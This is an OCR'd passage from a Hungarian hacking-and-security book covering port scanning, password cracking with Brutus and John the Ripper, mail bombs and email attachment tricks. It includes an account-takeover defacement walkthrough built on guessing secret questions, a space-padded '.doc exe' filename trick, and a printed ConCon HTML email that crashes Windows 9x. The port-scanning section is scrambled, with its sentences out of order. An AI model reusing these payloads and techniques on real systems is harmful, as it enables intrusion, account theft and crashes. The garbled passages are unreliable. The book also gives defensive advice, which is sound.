Éppen ezért a szkenner multi-socket eljárást alkalmaz. a host visszajelzése pedig. Hogy ezek közül melyiket választják. hogy nagyon gyorsan vezet eredményre. 6. és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. RST-ACK. és kérdéses lenne. amelynél egyidejűleg nagyon sok kérdést tud feltenni.6 Szkennelés . amelyek mellett a feladatot meg kell oldani. hiszen e szó jelentés itt az. illetve portját szólítják meg. ha nem érhető el a port. akkor az elérhetőnek számít. és a kapcsolat létrejött. 6. hogy minden időkeretet túllépne. de időközben már Windowshoz is kifejlesztették. akkor SYN-ACK. 6. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához. többek között arról. hogy minden portot le lehet-e szkennelni. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. Az előnye viszont. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni. lehetőleg gyorsan. és visszadják a rendszer válaszait. A szkenner A szkenneléshez szükség van egy portszkennerre. különben nehezen érthetők az összefüggések. hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot. ha elérhető. A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. Közben különböző információkat gyűjtenek. A szkennerek kérdéseket küldenek a portoknak. Ehhez minden fontos információ megtalálható a 3. No persze nem a hagyományos értelemben vett szkennelésről van szó.A rések keresése 6.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz. mert nagyon feltűnő. Minden hacker elvégzi a portszkennelést a célrendszerén. hogy egy rendszer minél több csatolófelületét. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó. A portszkennek a támadók legfontosabb eszközei. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát. a hacker pedig észrevétlen szeretne maradni. Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. Az mindenesetre biztos.1. A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit. melyek engedik meg kapcsolat felépítését. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni. lehetségesek-e anonim loginek.mindkettő a Linux alatt gyökerezik. akkor nem fogják észrevenni ezt a szkennelést. hogy kitalálják. A legismertebb szkennerek közé tartozik a Nessus és az nmap . hogy milyen szolgáltatások futnak a rendszeren. fejezetben. Ehhez a következőképpen járnak el: a szkenner. Ennek az eljárásnak az előnye. Emellett a portszkennelés arra is szolgál.2. Ebben az esetben a szkenner ismét ACK-val válaszol.2.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. az azoktól a feltételektől függ. A támadóknak azonban nem felel meg. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). Ezért minden rendszergazdának jól kell ismernie a szkennereket. akinek root-jogai . mielőtt munkához látna.

hogy a port nem elérhető. Ezek a „letapogatások" azonban csak Unix alatt működnek. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre. Természetesen ez az eljárás is nagyon időigényes. illetve rendszererőforrásaitól függ. A támadók most hozzákezdenének információkat gyűjteni a célrendszerről.2. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk). hogy melyik hostok elérhetők. akik rootként vannak bejelentkezve. illetve darabolódnak. az ICMP-ECHO-REPLY csomaggal válaszol. és gyakran megbízhatatlan. hogy találjanak egy hostot. A szkennelésnek ez a módja nagyon hosszadalmas.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. hogy a számítógép kiadjon egy választ. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától. akkor többnyire ezt az üzenetet kapjuk: Error 13 . 6. hiszen system admin jogok kellenek hozzá. amit sajnos. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi.2.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. Ez az operációs rendszernél kezdődik.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP. és azok a felhasználók.2. . és várunk egy UDP-ICMP-PORT-UNREACH üzenetre. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája. amely a számítógépen fut. Csak a lezárt port küld vissza egy üzenetet. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal. Ráadásul csak Linux alatt működik.vannak. stb. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést. Megvan tehát a cél. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni. és másodszor. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. Ha a számok valamelyike mögött van egy rendszer.) futnak a rendszeren. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. 6.Try Again.2. Tehát szkenneljük a portokat. Telnet. hogy milyen szervizek (FTP. mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve.8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. hogy mégis kapjunk informatív visszajelzést . Aszerint.2. a normál Error 111 . a nyitottak ezt nem teszik. egyszer. Ezen a módon lehet meggyőződni arról. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik. ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat. HTTP. HTTPS.13-as hibánál a port le van zárva. 6. akik rootként vannak bejelentkezve. A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet. Ez gondoskodik ugyanis arról. más protokollokkal ellentétben. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra. amelyek nem feltűnőek. akkor egy portlista segítségével lehet áttekintést kapni arról.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. a támadó utánanéz a megfelelő kihasználási lehetőségeknek. 6. A FIN-csomagokat arra használják. nem igazolja vissza a fogadást. megkapják az ICMP PORT UNREACH üzeneteket. amelynél csak azok a userek kapnak pozitív visszajelzést. 6.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé. A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. nem látunk. 6. hogy „érdekes" jelzéseket kapjon.Connection refused üzenet helyett.2. Ez azt jelenti.

amelyek nélkül a betörés lehetetlen volna. ha valaki például egy FTP-szervert működtet a rendszerén. A tűzfalakat arra is be lehet állítani. ameddig lehetséges. Ezért fontos védekezni a portszkennelés ellen. .2. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). hogy egy rendszert szkenneljen. port elérhetőségét (lásd. és megpróbálkoznak egy portra kapcsolódni. hogy figyelmeztető üzenetet küldjenek. amint TCP-kapcsolatok érkeznek be. Természetesen nagyon nehéz valakit visszatartani attól. illetve naplóztatni a szkenneléseket. vagy portscan detektorok. hogy ne kínáljunk támadási felületet. hogy azonosítani lehessen a lehetséges támadót. Tehát minden szolgáltatást. már akkor is. Ez azonban többnyire nehezen kivitelezhető. ha a szkennelés nem talál nyitott portokat. amelyek feljegyzik a portszkenneket. hogy megtalálják és analizálják a célrendszerüket.6. mint például a BlackICE. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz. amelyet a betörők végrehajtanak. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. inaktívan kellene tartani. Itt a tűzfalak segítenek. A legjobb védelem. Ezen keresztül számos fontos információt begyűjthetnek. mint amilyen a Norton Internet Security.9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés.

2 7.3 Hackelt security-site .7.5 A John legfontosabb parancsai 7.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.4 Jelszavak megfejtése a John the Ripperrel 7.1 7.4.6 A jelszófájl Single Mode .2 A szólista módszer 7.4.1 7.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.Tartalom 7.4.3.3.4.4.2 Beállítások áttekintése 7. fejezet .4 External mód 7.4.3 Incremental mód 7.

A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt.az első: várni pár napot egy mail-re a szolgáltatótól. amelyeket senkinek sem adnánk meg önként. és megváltoztatná a kontaktcímét. A jelszavak kiderítésére. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni. a www. egy ismert biztonsági és trójai információs oldal. Hogy hogyan is működnek ezek a programok.flieger@dmx. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. Az áldozat. A legfontosabb azonban az. A klasszikus jelszótörő egy olyan program. Ez történhet mondjuk egy telefonhívással. hogy egy jelszó ne legyen túl egyszerű.thsecurity. Természetesen a jelszófeltörők elleni legjobb védelem. és látta.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt.de volt. amelyekre a Social Enineeringhez szükség van. mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását. hogy a webmesternek két GMX-fiókja van: tobias. mert ezekben szerepelt az ügyfélszám. De ez biztosan feltűnne a felhasználónak.puretec. Itt a következő történt.denic.de és pegasuss. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat. amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik.de (a címeket az adatvédelem miatt megváltoztattuk). amelyet a GMX-adatokból megtudott. hihetetlen. Most egy kicsit körülnézett a GMX felhasználói menüben.haennle@gmx. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval. A hacker a felhasználó születési dátumával kezdett. amelyet egy m \ r3nda nevű hacker kinézett magának. megváltoztatta a jelszót.7 Jelszófeltörés ta.kulcsszó: email-cím. az a fejezet 7.de. a „biztos jelszó" sem fog kimaradni. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni. És nézzenek oda: ez megint telitalálatnak bizonyult.de) és a Puretec (www. A kreativitás. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. Az egyik legfontosabb a Social Engineering. Az első címet kontaktcímként adta meg a weboldalon. A jelszófeltörésről oldalakat lehetne írni. hamar rájött. és máris büszke tulajdonosa lett egy GMX-accountnak.de) szolgáltatónál szerepelt kontaktcímként. illetve feltörésére különböző lehetőségek vannak. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. hogy ismeretlenek olyan információkat csaljanak ki tőlünk. hogy milyen névről van szó. Tehát fogta Tobias-t. így két lehetőség adódott . és a jelszóválasztás biztonságát a középpontba állítani..3 pontjából derül ki. amivel ilyenkor eljárnak. Kutatás közben megállapítot- Itt egy honlap volt . A támadó először megnézte a GMX-titkos kérdést. tehát tobias. Tehát a hackernek más eszközökhöz kellett folyamodnia. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste. amely egy lista segítségével minden lehetséges variációt megjátszik.haennle@gmx. amire szüksége volt ahhoz. Tehát ne hagyjuk. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. 7. a második a Denic-nél (www. amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni. amelyben a főnökünk keresztnevét kérdezik . De nem voltak mail-ek a szolgáltatótól.

Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását.). hogy a felhasználónak lehetővé tegyék. • alfanumerikus karaktersorból. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után. A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb. • semmi duplázás. • vegyesen kis. • semmi születési dátum és hasonlók. megváltoztatni a jelszavát. NetBios stb. Ezután ki lehet választani a támadás fajtáját. • egy cetlit teszünk a billentyűzet alá vagy a monitorra. tehát ne legyen „hhaalloo". amelyek benne lehetnek a jelszólistákban vagy a szótárakban.3 A jelszófeltörők A jelszófeltörők olyan programok. • a jelszó egy fájlban van mentve a gépen. • ne legyenek olyan szavak. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere. az alkalmatlan jelszó révén. A jelszót a legritkább esetben fejtik vissza. hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP. A Brute Force annyit jelent: nyers erőszak. POP3.és nagybetűkből állnak. Telnet. A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. amelyek jelszavakat fednek fel. HTTP. E programok nem tesznek mást. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét. ha elfelejtette.2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. A jó jelszavak • több mint tíz karakterből. 7. kml34Hs9. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. ehelyett egy névről nagyon jól ismert eljárást. ha • mindenütt ugyanazt a jelszót használjuk. Egy példa az ilyesfajta programra a Brutus. . hogy ki kerüljék az alkalmazott biztonsági intézkedéseket. a Brute Force-ot használják. 7. pl. • ne legyen szabványos.Ez bizony egy nagyon jó példa arra. Az internetjelszavak minden fajtájához szívesen használják. amíg megtalálják az igazit. és ráírjuk a jelszót. mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. A jelszót kettő-négy hetente cserélni kell. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás.

HTTP. Egy további. hogy a megadott jelszólehetőségeket például DES-sel kódolja. external). telefonszám stb. hogy milyen gyakran létesítsen kapcsolatot a program.. Itt lehet egy névlistát választani különböző user nevekből.txt. POP3. amelyeket a Brutus mellékel. szólista. Use Username: kiválasztva. hogy milyen módban indult el (single. FTP. a . Ha a jelszavak kódolt állapotban egyeznek. mert az már ismert.net. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése.1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). a támadásokhoz hasznos tulajdonság egy beépített proxy. a rendelkezésre álló processzor sebességétől függ. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. és az eredményt összehasonlítja a megfejtendő jelszóval. Lehet szólistával. Timeout: megadható. Jóska. Fercsi stb. de nincs meg a hozzá tartozó jelszó. Így lenne ez például akkor is.4. Itt lehet egy szólistát betölteni. hogy mennyi idő múlva szakítsa meg a program a kapcsolatot. amelyen pl. azaz a userek személyes adatait. és helyette a shadow-fájlban tárolja).4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő. 7. 7. amelyek. ezért a program egyes verziói különböző processzorokra optimalizáltak. Use Proxy: nincs kiválasztva. Type: itt lehet kiválasztani a cél típusát. Telnet. a Brutus itt lehetővé teszi egy proxy bejegyzését.het tölteni. ha elfelejtettük a fiók-jelszavunkat. SMB (NetBOIS) stb.3. Connection: meg lehet adni. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták. 7. Pass Fik: words. Port: a port megadása. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. HTTP esetén a 80-as port. combo-listával vagy Brute Force-szal. például név. amely úgy működik.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. FTP-nél a 21-es. Pass Mode: szólista. A John működése azon alapul. amelyet a Brutus mellé adnak. aszerint. amely megakadályozza. hogyan történjen a feltörés. Single User: kiválasztva User ID: usernév (pl. hogy vissza lehessen követni a támadót.). amelyet előre meg lehet adni.3. ha a jelszó a listán van. Az idő. jelszóként felhasználni. pl: lol@gmx. a POP3 vagy FTP-account van. hogy a jelszavakat eltávolítja a passwd fájlból. itt lehet kiválasztani. a program ennél az eljárásnál csak egy user névvel próbálkozik. igencsak megrövidítik a feltörést. incremental.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. akkor visszafejtve is egyezniük kell. Method: HEAD KeepAlive: megjelölve. A John the Ripper szerény felhasználói felülete 7.

Hogy hány ilyen pár van a fájlban tárolva. És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. Azt mindenesetre figyelembe kell venni.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt. hogy összevezeti a passwd fájlt és a shadow fájlt. 7.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. A szólistát úgy kell felépíteni. végül incremental módban futtatja le a Johnt. vagy eltávolítják a dupla bejegyzéseket).GECOS-információk azonban még mindig a passwd fájlban vannak. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza.ill. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. hogy minden lehetséges kombinációt ellenőriz. a LIST. akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:). Ez a parancs szólista módban indítja a Johnt. mert a John egy kicsikét gyorsabban dolgozik. Ha a single módot kell használni. A jelszavak „árnyékolva" sem lehetnek. hogy a szükséges idő (a processzor teljesítményétől. hogy a szólista ábécé-sorrendben legyen. a szólista német részét ebben az esetben el lehet hagyni. Arra is ügyelni kell. hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok.3 Incremental mód Ez a John leghatalmasabb üzemmódja.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. hogy betűkből. 7. például több listát összefűznek. . mert teljes mértékben konfigurálni kell. Ez a parancs incremental módban indítja a Johnt. adminspecifikus szólistákat előállítani. ha a felhasználók személyes információikat használják jelszóként. az nem túl lényeges. majd szólista. Ez a mód természetesen csak akkor hatékony. Ezeket kettősponttal elválasztva. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként.4. Ez a módszer egyben nagyon gyors is. ábécé-sorrendbe rendezik. és ezzel a siker valószínűségét növelni. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* . mégpedig úgy. számokból vagy kombinációkból áll. Ez a parancs external módban indítja a Johnt. EXTERNAL: előtt definiált MODE tulajdonságokkal. vissza tud fejteni úgy. amelyek a szólisták kezelésében segítenek. A john parancs kilistáz minden lehetséges paramétert. a USERNAME: PASSWORD séma szerint kell tárolni. ezért nem szabad alábecsülni. függetlenül attól. csak arra kell figyelni. mert minden rendkelkezésre álló információt fel lehet használni. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7.4 External mód Ez a mód inkább tapasztalt felhasználóknak való.4. különleges karakterekből.4. 7. Ebben az esetben az Unshadow program segít. Minden létező jelszót. Minden parancs után meg kell még adni a jelszófájlt is. Ezt az eljárást Brute Force-nak is nevezik. 7. John fájlnév John -show Ez a parancs először single. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. hogy minden sorban csak egyetlen karakterfüzér legyen. kódolva=john:GjstuOeYjOEhc). így lehet szerver. Erre a parancsra mutatja meg a program a megfejtett jelszavakat.4.4.

3 AConConbug 8.2.2 Milyen biztonsági rések vannak? .1 Mailbombák .8.Tartalom 8.2 A fájlmelléklet kitömése 8.2 ICQ .biztonsági kockázat? 8. fejezet .1.praktikus és veszélyes 8.1 E-mail-támadások 8.1.túlcsordul a postafiók 8.1 Az ICQ .1.2.

túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait. 8. Ebben a tényben azonban veszélyek is rejlenek. 8. Kiderül. egyre újabb és újabb szolgáltatásokat kínálnak a számukra. inkább csak idegölők és zavarók. aki nem kapja meg a megrendelés-maileket. mivel a mailbox a támadás miatt túltelítődik.1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten. amelyek sok felhasználóban nem is tudatosulnak. Nehéz felmérni.1 Mailbombák . és nem tud több mail-t fogadni. hanem abban is. amelyeknek fontos kommunikációs eszközt jelent az internet. vagy . hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen.és víruslehetőségekről itt már nem beszélünk. hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre. A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat.1. hogy a címzett postafiókja hamar túllépi a maximális kapacitását. mert mailbomba-támadás áldozata lett. Ezt ugyanis. A mailbombázáshoz a támadók számos programból választhatnak. hogy a feladó adatait ellenőrizni lehessen. Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét. A különböző trójai. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg.lehet. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve.választás szerint hamis feladócímet is meg tudnak adni.és drága . ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. Ugyanis elég időigényes . sőt még arra is van mód. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik. ha tudják. hogy a mailbomba-támadások mögött mennyire van stratégia. akkor bosz- . E-mail-bombázó Arzytól szánthatják. ezeket az adott témának szentelt fejezetek tárgyalják. Az interneteléréssel azonban növekednek azok a veszélyek. és a tartalmak is mind vonzóbbakká válnak. ezt pedig a hackerek kihasználják a rendszerek megtámadásához. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket. tehát csak egyszerű szöveget szállítanak. hogy egy fontos mail-re vár.8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. Ennek alapján nem nyújtanak lehetőséget arra. Ennek természetesen az a következménye. A legtöbbek életéből már nem maradhat ki ez a médium. hogy anonimek maradnak. a szerver vissza fogja utasítani.

amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál. amelyek agresszív reklámjaikkal tűnnek fel az interneten. Ez megakadályozza. mint az AOL vagy a GMX. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. a következőképpen néz ki: Profil. A csatolt fájl. az úgynevezett spam-et. Figyelmeztető üzenet az Outlooktól.1. A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal. a mailbombázó programoknak több szerverrendszert is meg kell adni. hogy az *. Ártatlannak tűnik .doc-ot mutatja. 8.EXE. és a munkát felosszák több különböző szerver között. postásként fognak működni. *.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil. felhasználói biztosan jól ismerik az előbb említett mailreklámot. Általánosságban érvényes. az akaratuk ellenére. és feltelepül az esetleg hozzáfűzött vírus vagy trójai. Természetesen ebben az esetben azonnal elindul a megfelelő program. hogy felgyorsítsák az akár 10 ezer mail továbbítását. mint a Sub7 (lásd a trójaiakról szóló fejezetet).microsoft. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne. hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz.BAT nevű mail-mellékletek veszélyesek lehetnek. Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken. így a felhasználó feltételezheti. A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli.com/ címen egy Outlook-frissítést is kínál. amelyek. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait. a merevlemezre mentve. amit közvetlenül is meg lehet nyitni az Outlookból.így működnek a mailbombák Ahhoz. hogy álcázzák a csatolt fájlt. hogy a címzetteknek továbbítsák a mail-eket. Ezért gyakran egy trükkhöz folyamodnak. A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót. még Word-ikont is tud varázsolni.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. hogy előzőleg a merevlemezre kellene menteni. hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja.COM. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre. Ezt egyébként azért teszik. Ezen kívül a Microsoft a http://windowsupdate. hogy csak egy hagyományos Word-dokumentumról van szó. anélkül.egy mail kipufferolt fájlmelléklete . *.

"Arial". font-weight: regular. aminek az a következménye. "Comic Sans MS". A ConCon „nagy kék halált" okoz. font-family: "Tempus Sans ITC". hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben. Egy példa erre a híres Windows ConCon bug.telekabel.de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. és újra kell indítani a PC-t. BR.charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body. font-size: 20pt. hogy újra kell installálni az operációs rendszert. font-size: 24pt. de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül. MENU.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz.8. amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html. Ez veszélyes lehet a nem mentett adatok miatt. P. amely a foglalt eszköznevek meghívására vonatkozik. BLOCKQUOTE. Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül. DT. "Arial".1. ADDRESS. font-weight: regular. font-size: 30pt.=20 } hl . font-family: "Tempus Sans ITC". DIR. font-weight: regular. "Comic Sans MS".3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk. "Comic Sans MS". = LI { color: FF3300. OL. DD.=20 } hl { color: FF3300.72." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. UL. } ? { </STYLE> <META content=3D'"MSHTML 4. "Ariar.3110. DIV.gif> <P>Üzenetet ide beilleszteni. Az is ismert. font-family: "Tempus Sans ITC". PRE.

amikor bejelentkezik a kommunikációba. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. és kapcsolatba léphetünk vele. Ha egy másik felhasználót keresünk. hogy ki van onlineban. Így a rendszer nem tud elindulni. Manapság már majdnem 150 millió szám létezik. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. akikkel rendszeresen szeretnénk kapcsolatot tartani. hogy a támadónak információkat szolgáltat az áldozatról. A státuszon lehet látni. egyszerűen a Find User alatt megadjuk a nevét. és újra kelljen indítani. hogy csak a fontosabbakra szorítkozzunk. 8. Azok a támadások is kedveltek. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat. hogy pillanatnyilag békén hagyják. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik. A kapcsolati listára minden felhasználót bejegyezhetünk. amelyen a kliens fut.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. amely. amelyek kikerülik ezeket a beállításokat.Ezt a mailt elég kijelölni és belenézni. mint magán az ICQnetworkön. 2. és a gép lefagy. Ezért ez sem jelent biztos védelmet. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek. amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot (lásd ebben a fejezetben. A felhasználóknak észnél kell lenniük. . a Mailbombák alatt. amelyek biztonsági kockázatként jelölik meg az ICQ-t.com/downloads/release. Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. ofíline-ban. sőt MacOS-hoz és BeOS-hoz is van ilyen. A kliense a legkülönbözőbb platformokon megtalálható. és a támadóknak szállítják 